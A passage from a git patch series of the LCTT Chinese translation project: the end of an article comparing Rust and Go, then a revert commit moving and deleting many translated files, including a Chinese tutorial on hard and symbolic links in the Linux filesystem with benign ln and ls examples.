语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 +五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 +在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 + + From 11e1c8c450f35378d5e24449e15628748ad98053 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:21:41 +0800 Subject: [PATCH 0234/1627] Revert "Merge branch 'master' of https://github.com/LCTT/TranslateProject" This reverts commit 59837a2677e18ebf7eb3c0a586662c72098fd1e1, reversing changes made to fb45dbb3d739a5ad577f34bfb7b74af9c5d96686. --- .../20141028 When Does Your OS Run.md | 0 ... Firewalld in Multi-Zone Configurations.md | 0 .../20170227 Ubuntu Core in LXD containers.md | 0 ... THE SOFTWARE CONTAINERIZATION MOVEMENT.md | 0 ...ner OS for Linux and Windows Containers.md | 0 ... Life-Changing Magic of Tidying Up Code.md | 0 ... guide to links in the Linux filesystem.md | 300 -------- ...ldcard Certificates Coming January 2018.md | 0 ...andy Tool for Every Level of Linux User.md | 0 ...GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md | 0 ...0928 3 Python web scrapers and crawlers.md | 0 .../20171002 Scaling the GitLab database.md | 0 ...3 PostgreSQL Hash Indexes Are Now Cool.md | 0 ...inux desktop hasnt jumped in popularity.md | 0 ...ant 100 command line productivity boost.md | 0 ...20171008 8 best languages to blog about.md | 0 ...ext Generation of Cybersecurity Experts.md | 0 ...itter Data in Apache Kafka through KSQL.md | 0 ...p a Postgres database on a Raspberry Pi.md | 0 .../{201711 => }/20171011 Why Linux Works.md | 0 ...easons open source is good for business.md | 0 ...71013 Best of PostgreSQL 10 for the DBA.md | 0 ... cloud-native computing with Kubernetes.md | 0 ...5 Monitoring Slow SQL Queries via Slack.md | 0 ... Use Docker with R A DevOps Perspective.md | 0 .../20171016 Introducing CRI-O 1.0.md | 0 ...20171017 A tour of Postgres Index Types.md | 0 .../20171017 Image Processing on Linux.md | 0 ...iners and microservices change security.md | 0 ...n Python by building a simple dice game.md | 0 ...ecure Your Network in the Wake of KRACK.md | 0 ...Simple Excellent Linux Network Monitors.md | 0 ...cker containers in Kubernetes with Java.md | 0 ...ols to Help You Remember Linux Commands.md | 0 ...ndroid on Top of a Linux Graphics Stack.md | 0 ...0171024 Top 5 Linux pain points in 2017.md | 0 ...et s analyze GitHub’s data and find out.md | 0 ...u Drop Unity Mark Shuttleworth Explains.md | 0 ...Backup, Rclone and Wasabi cloud storage.md | 0 ...26 But I dont know what a container is .md | 0 .../20171026 Why is Kubernetes so popular.md | 0 .../20171101 How to use cron in Linux.md | 0 ... to a DCO for source code contributions.md | 0 ...nage EXT2 EXT3 and EXT4 Health in Linux.md | 0 .../20171106 Finding Files with mlocate.md | 0 ...Publishes Enterprise Open Source Guides.md | 0 ...mmunity clue. Here s how to do it right.md | 0 ...dopts home-brewed KVM as new hypervisor.md | 0 ... created my first RPM package in Fedora.md | 0 ...est applications with Ansible Container.md | 0 ...71110 File better bugs with coredumpctl.md | 0 ... ​Linux totally dominates supercomputers.md | 0 ...1116 5 Coolest Linux Terminal Emulators.md | 0 ...7 How to Easily Remember Linux Commands.md | 0 ...tting started with OpenFaaS on minikube.md | 0 ...20 Containers and Kubernetes Whats next.md | 81 -- ...Install Android File Transfer for Linux.md | 75 -- ...and Certification Are Key for SysAdmins.md | 72 -- ...our Terminal Session To Anyone In Seconds.md | 0 ...Search DuckDuckGo from the Command Line.md | 97 --- ...The One in Which I Call Out Hacker News.md | 86 +++ ...nject features and investigate programs.md | 211 ------ ...an event Introducing eBPF Kernel probes.md | 361 --------- ...sers guide to Logical Volume Management.md | 233 ------ ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 110 --- ...170530 How to Improve a Legacy Codebase.md | 108 +++ ...es Are Hiring Computer Security Experts.md | 91 --- ... guide to links in the Linux filesystem.md | 314 ++++++++ ...ow to answer questions in a helpful way.md | 172 ----- ...Linux containers with Ansible Container.md | 114 --- .../20171005 Reasons Kubernetes is cool.md | 148 ---- ...20171010 Operating a Kubernetes network.md | 216 ------ ...LEAST PRIVILEGE CONTAINER ORCHESTRATION.md | 174 ----- ...ow Eclipse is advancing IoT development.md | 83 ++ ...ive into BPF a list of reading material.md | 711 ------------------ .../20171107 GitHub welcomes all CI tools.md | 95 --- sources/tech/20171112 Love Your Bugs.md | 311 -------- ... write fun small web projects instantly.md | 76 -- .../20171114 Sysadmin 101 Patch Management.md | 61 -- .../20171114 Take Linux and Run With It.md | 68 -- ...obs Are Hot Get Trained and Get Noticed.md | 58 -- ... and How to Set an Open Source Strategy.md | 120 --- ...ux Programs for Drawing and Image Editing.md | 130 ---- ...171120 Adopting Kubernetes step by step.md | 93 --- ...20 Containers and Kubernetes Whats next.md | 98 +++ ... Why microservices are a security issue.md | 116 --- ...and Certification Are Key for SysAdmins.md | 70 ++ ...Could Be Your New Favorite Container OS.md | 7 +- ...Help Build ONNX Open Source AI Platform.md | 76 -- ... Your Linux Server Has Been Compromised.md | 156 ---- ...71128 The politics of the Linux desktop.md | 110 --- ... a great pair for beginning programmers.md | 142 ---- ... open source technology trends for 2018.md | 143 ---- ...actices for getting started with DevOps.md | 94 --- ...eshark on Debian and Ubuntu 16.04_17.10.md | 185 ----- ...n Source Components Ease Learning Curve.md | 70 -- ...eractive Workflows for Cpp with Jupyter.md | 301 -------- ...Unity from the Dead as an Official Spin.md | 41 - ...usiness Software Alternatives For Linux.md | 116 --- ...x command-line screen grabs made simple.md | 108 --- ...Search DuckDuckGo from the Command Line.md | 103 +++ ...Long Running Terminal Commands Complete.md | 156 ---- ...ke up and Shut Down Linux Automatically.md | 135 ---- ...1 Fedora Classroom Session: Ansible 101.md | 71 -- ...ow to Manage Users with Groups in Linux.md | 168 ----- ... to find a publisher for your tech book.md | 76 -- ...e your WiFi MAC address on Ubuntu 16.04.md | 160 ---- ... millions of Linux users with Snapcraft.md | 321 -------- ...inux command-line screen grabs made simple | 72 -- ...0171202 docker - Use multi-stage builds.md | 127 ---- ...The One in Which I Call Out Hacker News.md | 99 --- ...20161216 Kprobes Event Tracing on ARMv8.md | 16 +- ...170530 How to Improve a Legacy Codebase.md | 104 --- .../20170910 Cool vim feature sessions.md | 44 -- ...ng network connections on Linux systems.md | 0 ...ow Eclipse is advancing IoT development.md | 77 -- ...layer introduction part 1 the bio layer.md | 13 +- .../tech/20171108 Archiving repositories.md | 37 - ...6 Introducing security alerts on GitHub.md | 48 -- ...stem Logs: Understand Your Linux System.md | 68 -- ...Install Android File Transfer for Linux.md | 82 ++ ...Could Be Your New Favorite Container OS.md | 147 ---- ...every domain someone owns automatically.md | 49 -- ...ogle Translate From Command Line In Linux.md | 400 ---------- ...171201 Linux Journal Ceases Publication.md | 34 - ...ing Hardware for Beginners: Think Software | 89 --- 126 files changed, 960 insertions(+), 8338 deletions(-) rename published/{201711 => }/20141028 When Does Your OS Run.md (100%) rename published/{201711 => }/20170202 Understanding Firewalld in Multi-Zone Configurations.md (100%) rename published/{201711 => }/20170227 Ubuntu Core in LXD containers.md (100%) rename published/{201711 => }/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md (100%) rename published/{201711 => }/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md (100%) rename published/{201711 => }/20170608 The Life-Changing Magic of Tidying Up Code.md (100%) delete mode 100644 published/20170622 A users guide to links in the Linux filesystem.md rename published/{201711 => }/20170706 Wildcard Certificates Coming January 2018.md (100%) rename published/{201711 => }/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md (100%) rename published/{201711 => }/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md (100%) rename published/{201711 => }/20170928 3 Python web scrapers and crawlers.md (100%) rename published/{201711 => }/20171002 Scaling the GitLab database.md (100%) rename published/{201711 => }/20171003 PostgreSQL Hash Indexes Are Now Cool.md (100%) rename published/{201711 => }/20171004 No the Linux desktop hasnt jumped in popularity.md (100%) rename published/{201711 => }/20171007 Instant 100 command line productivity boost.md (100%) rename published/{201711 => }/20171008 8 best languages to blog about.md (100%) rename published/{201711 => }/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md (100%) rename published/{201711 => }/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md (100%) rename published/{201711 => }/20171011 How to set up a Postgres database on a Raspberry Pi.md (100%) rename published/{201711 => }/20171011 Why Linux Works.md (100%) rename published/{201711 => }/20171013 6 reasons open source is good for business.md (100%) rename published/{201711 => }/20171013 Best of PostgreSQL 10 for the DBA.md (100%) rename published/{201711 => }/20171015 How to implement cloud-native computing with Kubernetes.md (100%) rename published/{201711 => }/20171015 Monitoring Slow SQL Queries via Slack.md (100%) rename published/{201711 => }/20171015 Why Use Docker with R A DevOps Perspective.md (100%) rename published/{201711 => }/20171016 Introducing CRI-O 1.0.md (100%) rename published/{201711 => }/20171017 A tour of Postgres Index Types.md (100%) rename published/{201711 => }/20171017 Image Processing on Linux.md (100%) rename published/{201711 => }/20171018 How containers and microservices change security.md (100%) rename published/{201711 => }/20171018 Learn how to program in Python by building a simple dice game.md (100%) rename published/{201711 => }/20171018 Tips to Secure Your Network in the Wake of KRACK.md (100%) rename published/{201711 => }/20171019 3 Simple Excellent Linux Network Monitors.md (100%) rename published/{201711 => }/20171019 How to manage Docker containers in Kubernetes with Java.md (100%) rename published/{201711 => }/20171020 3 Tools to Help You Remember Linux Commands.md (100%) rename published/{201711 => }/20171020 Running Android on Top of a Linux Graphics Stack.md (100%) rename published/{201711 => }/20171024 Top 5 Linux pain points in 2017.md (100%) rename published/{201711 => }/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md (100%) rename published/{201711 => }/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md (100%) rename published/{201711 => }/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md (100%) rename published/{201711 => }/20171026 But I dont know what a container is .md (100%) rename published/{201711 => }/20171026 Why is Kubernetes so popular.md (100%) rename published/{201711 => }/20171101 How to use cron in Linux.md (100%) rename published/{201711 => }/20171101 We re switching to a DCO for source code contributions.md (100%) rename published/{201711 => }/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md (100%) rename published/{201711 => }/20171106 Finding Files with mlocate.md (100%) rename published/{201711 => }/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md (100%) rename published/{201711 => }/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md (100%) rename published/{201711 => }/20171107 AWS adopts home-brewed KVM as new hypervisor.md (100%) rename published/{201711 => }/20171107 How I created my first RPM package in Fedora.md (100%) rename published/{201711 => }/20171108 Build and test applications with Ansible Container.md (100%) rename published/{201711 => }/20171110 File better bugs with coredumpctl.md (100%) rename published/{201711 => }/20171114 ​Linux totally dominates supercomputers.md (100%) rename published/{201711 => }/20171116 5 Coolest Linux Terminal Emulators.md (100%) rename published/{201711 => }/20171117 How to Easily Remember Linux Commands.md (100%) rename published/{201711 => }/20171118 Getting started with OpenFaaS on minikube.md (100%) delete mode 100644 published/20171120 Containers and Kubernetes Whats next.md delete mode 100644 published/20171124 How to Install Android File Transfer for Linux.md delete mode 100644 published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md rename published/{201711 => }/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md (100%) delete mode 100644 published/20171130 Search DuckDuckGo from the Command Line.md create mode 100644 sources/tech/20090701 The One in Which I Call Out Hacker News.md delete mode 100644 sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md delete mode 100644 sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md delete mode 100644 sources/tech/20160922 A Linux users guide to Logical Volume Management.md delete mode 100644 sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md create mode 100644 sources/tech/20170530 How to Improve a Legacy Codebase.md delete mode 100644 sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md create mode 100644 sources/tech/20170622 A users guide to links in the Linux filesystem.md delete mode 100644 sources/tech/20170921 How to answer questions in a helpful way.md delete mode 100644 sources/tech/20171005 How to manage Linux containers with Ansible Container.md delete mode 100644 sources/tech/20171005 Reasons Kubernetes is cool.md delete mode 100644 sources/tech/20171010 Operating a Kubernetes network.md delete mode 100644 sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md create mode 100644 sources/tech/20171020 How Eclipse is advancing IoT development.md delete mode 100644 sources/tech/20171102 Dive into BPF a list of reading material.md delete mode 100644 sources/tech/20171107 GitHub welcomes all CI tools.md delete mode 100644 sources/tech/20171112 Love Your Bugs.md delete mode 100644 sources/tech/20171113 Glitch write fun small web projects instantly.md delete mode 100644 sources/tech/20171114 Sysadmin 101 Patch Management.md delete mode 100644 sources/tech/20171114 Take Linux and Run With It.md delete mode 100644 sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md delete mode 100644 sources/tech/20171115 Why and How to Set an Open Source Strategy.md delete mode 100644 sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md delete mode 100644 sources/tech/20171120 Adopting Kubernetes step by step.md create mode 100644 sources/tech/20171120 Containers and Kubernetes Whats next.md delete mode 100644 sources/tech/20171123 Why microservices are a security issue.md create mode 100644 sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md delete mode 100644 sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md delete mode 100644 sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md delete mode 100644 sources/tech/20171128 The politics of the Linux desktop.md delete mode 100644 sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md delete mode 100644 sources/tech/20171129 10 open source technology trends for 2018.md delete mode 100644 sources/tech/20171129 5 best practices for getting started with DevOps.md delete mode 100644 sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md delete mode 100644 sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md delete mode 100644 sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md delete mode 100644 sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md delete mode 100644 sources/tech/20171130 Excellent Business Software Alternatives For Linux.md delete mode 100644 sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md create mode 100644 sources/tech/20171130 Search DuckDuckGo from the Command Line.md delete mode 100644 sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md delete mode 100644 sources/tech/20171130 Wake up and Shut Down Linux Automatically.md delete mode 100644 sources/tech/20171201 Fedora Classroom Session: Ansible 101.md delete mode 100644 sources/tech/20171201 How to Manage Users with Groups in Linux.md delete mode 100644 sources/tech/20171201 How to find a publisher for your tech book.md delete mode 100644 sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md delete mode 100644 sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md delete mode 100644 sources/tech/20171202 Scrot Linux command-line screen grabs made simple delete mode 100644 sources/tech/20171202 docker - Use multi-stage builds.md delete mode 100644 translated/tech/20090701 The One in Which I Call Out Hacker News.md rename {published => translated/tech}/20161216 Kprobes Event Tracing on ARMv8.md (98%) delete mode 100644 translated/tech/20170530 How to Improve a Legacy Codebase.md delete mode 100644 translated/tech/20170910 Cool vim feature sessions.md rename {published => translated/tech}/20171009 Examining network connections on Linux systems.md (100%) delete mode 100644 translated/tech/20171020 How Eclipse is advancing IoT development.md rename {published => translated/tech}/20171029 A block layer introduction part 1 the bio layer.md (95%) delete mode 100644 translated/tech/20171108 Archiving repositories.md delete mode 100644 translated/tech/20171116 Introducing security alerts on GitHub.md delete mode 100644 translated/tech/20171117 System Logs: Understand Your Linux System.md create mode 100644 translated/tech/20171124 How to Install Android File Transfer for Linux.md delete mode 100644 translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md delete mode 100644 translated/tech/20171130 New Feature Find every domain someone owns automatically.md delete mode 100644 translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md delete mode 100644 translated/tech/20171201 Linux Journal Ceases Publication.md delete mode 100644 translated/tech/Linux Networking Hardware for Beginners: Think Software diff --git a/published/201711/20141028 When Does Your OS Run.md b/published/20141028 When Does Your OS Run.md similarity index 100% rename from published/201711/20141028 When Does Your OS Run.md rename to published/20141028 When Does Your OS Run.md diff --git a/published/201711/20170202 Understanding Firewalld in Multi-Zone Configurations.md b/published/20170202 Understanding Firewalld in Multi-Zone Configurations.md similarity index 100% rename from published/201711/20170202 Understanding Firewalld in Multi-Zone Configurations.md rename to published/20170202 Understanding Firewalld in Multi-Zone Configurations.md diff --git a/published/201711/20170227 Ubuntu Core in LXD containers.md b/published/20170227 Ubuntu Core in LXD containers.md similarity index 100% rename from published/201711/20170227 Ubuntu Core in LXD containers.md rename to published/20170227 Ubuntu Core in LXD containers.md diff --git a/published/201711/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md b/published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md similarity index 100% rename from published/201711/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md rename to published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md diff --git a/published/201711/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md b/published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md similarity index 100% rename from published/201711/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md rename to published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md diff --git a/published/201711/20170608 The Life-Changing Magic of Tidying Up Code.md b/published/20170608 The Life-Changing Magic of Tidying Up Code.md similarity index 100% rename from published/201711/20170608 The Life-Changing Magic of Tidying Up Code.md rename to published/20170608 The Life-Changing Magic of Tidying Up Code.md diff --git a/published/20170622 A users guide to links in the Linux filesystem.md b/published/20170622 A users guide to links in the Linux filesystem.md deleted file mode 100644 index 7d731693d8..0000000000 --- a/published/20170622 A users guide to links in the Linux filesystem.md +++ /dev/null @@ -1,300 +0,0 @@ -用户指南:Linux 文件系统的链接 -============================================================ - -> 学习如何使用链接,通过从 Linux 文件系统多个位置来访问文件,可以让日常工作变得轻松。 - -![linux 文件链接用户指南](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/links.png?itok=enaPOi4L "A user's guide to links in the Linux filesystem") - -Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] - -在我为 opensource.com 写过的关于 Linux 文件系统方方面面的文章中,包括 [Linux 的 EXT4 文件系统的历史、特性以及最佳实践][10]; [在 Linux 中管理设备][11];[Linux 文件系统概览][12] 和 [用户指南:逻辑卷管理][13],我曾简要的提到过 Linux 文件系统一个有趣的特性,它允许用户从多个位置来访问 Linux 文件目录树中的文件来简化一些任务。 - -Linux 文件系统中有两种链接link硬链接hard link软链接soft link。虽然二者差别显著,但都用来解决相似的问题。它们都提供了对单个文件的多个目录项(引用)的访问,但实现却大为不同。链接的强大功能赋予了 Linux 文件系统灵活性,因为[一切皆是文件][14]。 - -举个例子,我曾发现一些程序要求特定的版本库方可运行。 当用升级后的库替代旧库后,程序会崩溃,提示旧版本库缺失。通常,库名的唯一变化就是版本号。出于直觉,我仅仅给程序添加了一个新的库链接,并以旧库名称命名。我试着再次启动程序,运行良好。程序就是一个游戏,人人都明白,每个玩家都会尽力使游戏进行下去。 - -事实上,几乎所有的应用程序链接库都使用通用的命名规则,链接名称中包含了主版本号,链接所指向的文件的文件名中同样包含了小版本号。再比如,程序的一些必需文件为了迎合 Linux 文件系统规范,从一个目录移动到另一个目录中,系统为了向后兼容那些不能获取这些文件新位置的程序在旧的目录中存放了这些文件的链接。如果你对 `/lib64` 目录做一个长清单列表,你会发现很多这样的例子。 - -``` -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwd -> ../../usr/share/cracklib/pw_dict.pwd -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwi -> ../../usr/share/cracklib/pw_dict.pwi -lrwxrwxrwx. 1 root root 27 Jun 9 2016 libaccountsservice.so.0 -> libaccountsservice.so.0.0.0 --rwxr-xr-x. 1 root root 288456 Jun 9 2016 libaccountsservice.so.0.0.0 -lrwxrwxrwx 1 root root 15 May 17 11:47 libacl.so.1 -> libacl.so.1.1.0 --rwxr-xr-x 1 root root 36472 May 17 11:47 libacl.so.1.1.0 -lrwxrwxrwx. 1 root root 15 Feb 4 2016 libaio.so.1 -> libaio.so.1.0.1 --rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.0 --rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.1 -lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libakonadi-calendar.so.4.14.26 --rwxr-xr-x. 1 root root 816160 Jan 16 16:39 libakonadi-calendar.so.4.14.26 -lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 -``` - -`/lib64` 目录下的一些链接 - -在上面展示的 `/lib64` 目录清单列表中,文件模式第一个字母 `l` (小写字母 l)表示这是一个软链接(又称符号链接)。 - -### 硬链接 - -在 [Linux 的 EXT4 文件系统的历史、特性以及最佳实践][15]一文中,我曾探讨过这样一个事实,每个文件都有一个包含该文件信息的 inode,包含了该文件的位置信息。上述文章中的[图2][16]展示了一个指向 inode 的单一目录项。每个文件都至少有一个目录项指向描述该文件信息的 inode ,目录项是一个硬链接,因此每个文件至少都有一个硬链接。 - -如下图 1 所示,多个目录项指向了同一 inode 。这些目录项都是硬链接。我曾在三个目录项中使用波浪线 (`~`) 的缩写,这是用户目录的惯例表示,因此在该例中波浪线等同于 `/home/user` 。值得注意的是,第四个目录项是一个完全不同的目录,`/home/shared`,可能是该计算机上用户的共享文件目录。 - -![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) - -*图 1* - -硬链接被限制在一个单一的文件系统中。此处的“文件系统” 是指挂载在特定挂载点上的分区或逻辑卷,此例中是 `/home`。这是因为在每个文件系统中的 inode 号都是唯一的。而在不同的文件系统中,如 `/var` 或 `/opt`,会有和 `/home` 中相同的 inode 号。 - -因为所有的硬链接都指向了包含文件元信息的单一 inode ,这些属性都是文件的一部分,像所属关系、权限、到该 inode 的硬链接数目,对每个硬链接来说这些特性没有什么不同的。这是一个文件所具有的一组属性。唯一能区分这些文件的是包含在 inode 信息中的文件名。链接到同一目录中的单一文件/ inode 的硬链接必须拥有不同的文件名,这是基于同一目录下不能存在重复的文件名的事实的。 - -文件的硬链接数目可通过 `ls -l` 来查看,如果你想查看实际节点号,可使用 `ls -li` 命令。 - -### 符号(软)链接 - -硬链接和软链接(也称为符号链接symlink)的区别在于,硬链接直接指向属于该文件的 inode ,而软链接直接指向一个目录项,即指向一个硬链接。因为软链接指向的是一个文件的硬链接而非该文件的 inode ,所以它们并不依赖于 inode 号,这使得它们能跨越不同的文件系统、分区和逻辑卷起作用。 - -软链接的缺点是,一旦它所指向的硬链接被删除或重命名后,该软链接就失效了。软链接虽然还在,但所指向的硬链接已不存在。所幸的是,`ls` 命令能以红底白字的方式在其列表中高亮显示失效的软链接。 - -### 实验项目: 链接实验 - -我认为最容易理解链接用法及其差异的方法是动手搭建一个项目。这个项目应以非超级用户的身份在一个空目录下进行。我创建了 `~/temp` 目录做这个实验,你也可以这么做。这么做可为项目创建一个安全的环境且提供一个新的空目录让程序运作,如此以来这儿仅存放和程序有关的文件。 - -#### 初始工作 - -首先,在你要进行实验的目录下为该项目中的任务创建一个临时目录,确保当前工作目录(PWD)是你的主目录,然后键入下列命令。 - -``` -mkdir temp -``` - -使用这个命令将当前工作目录切换到 `~/temp`。 - -``` -cd temp -``` - -实验开始,我们需要创建一个能够链接到的文件,下列命令可完成该工作并向其填充内容。 - -``` -du -h > main.file.txt -``` - -使用 `ls -l` 长列表命名确认文件正确地创建了。运行结果应类似于我的。注意文件大小只有 7 字节,但你的可能会有 1~2 字节的变动。 - -``` -[dboth@david temp]$ ls -l -total 4 --rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -在列表中,文件模式串后的数字 `1` 代表存在于该文件上的硬链接数。现在应该是 1 ,因为我们还没有为这个测试文件建立任何硬链接。 - -#### 对硬链接进行实验 - -硬链接创建一个指向同一 inode 的新目录项,当为文件添加一个硬链接时,你会看到链接数目的增加。确保当前工作目录仍为 `~/temp`。创建一个指向 `main.file.txt` 的硬链接,然后查看该目录下文件列表。 - -``` -[dboth@david temp]$ ln main.file.txt link1.file.txt -[dboth@david temp]$ ls -l -total 8 --rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -目录中两个文件都有两个链接且大小相同,时间戳也一样。这就是有一个 inode 和两个硬链接(即该文件的目录项)的一个文件。再建立一个该文件的硬链接,并列出目录清单内容。你可以建立硬链接: `link1.file.txt` 或 `main.file.txt`。 - -``` -[dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l -total 16 --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link2.file.txt --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -注意,该目录下的每个硬链接必须使用不同的名称,因为同一目录下的两个文件不能拥有相同的文件名。试着创建一个和现存链接名称相同的硬链接。 - -``` -[dboth@david temp]$ ln main.file.txt link2.file.txt -ln: failed to create hard link 'link2.file.txt': File exists -``` - -显然不行,因为 `link2.file.txt` 已经存在。目前为止我们只在同一目录下创建硬链接,接着在临时目录的父目录(你的主目录)中创建一个链接。 - -``` -[dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -上面的 `ls` 命令显示 `main.file.txt` 文件确实存在于主目录中,且与该文件在 `temp` 目录中的名称一致。当然它们不是不同的文件,它们是同一文件的两个链接,指向了同一文件的目录项。为了帮助说明下一点,在 `temp` 目录中添加一个非链接文件。 - -``` -[dboth@david temp]$ touch unlinked.file ; ls -l -total 12 --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt --rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -使用 `ls` 命令的 `i` 选项查看 inode 的硬链接号和新创建文件的硬链接号。 - -``` -[dboth@david temp]$ ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -注意上面文件模式左边的数字 `657024` ,这是三个硬链接文件所指的同一文件的 inode 号,你也可以使用 `i` 选项查看主目录中所创建的链接的节点号,和该值相同。而那个只有一个链接的 inode 号和其他的不同,在你的系统上看到的 inode 号或许不同于本文中的。 - -接着改变其中一个硬链接文件的大小。 - -``` -[dboth@david temp]$ df -h > link2.file.txt ; ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -现在所有的硬链接文件大小都比原来大了,因为多个目录项都链接着同一文件。 - -下个实验在我的电脑上会出现这样的结果,是因为我的 `/tmp` 目录在一个独立的逻辑卷上。如果你有单独的逻辑卷或文件系统在不同的分区上(如果未使用逻辑卷),确定你是否能访问那个分区或逻辑卷,如果不能,你可以在电脑上挂载一个 U 盘,如果上述方式适合你,你可以进行这个实验。 - -试着在 `/tmp` 目录中建立一个 `~/temp` 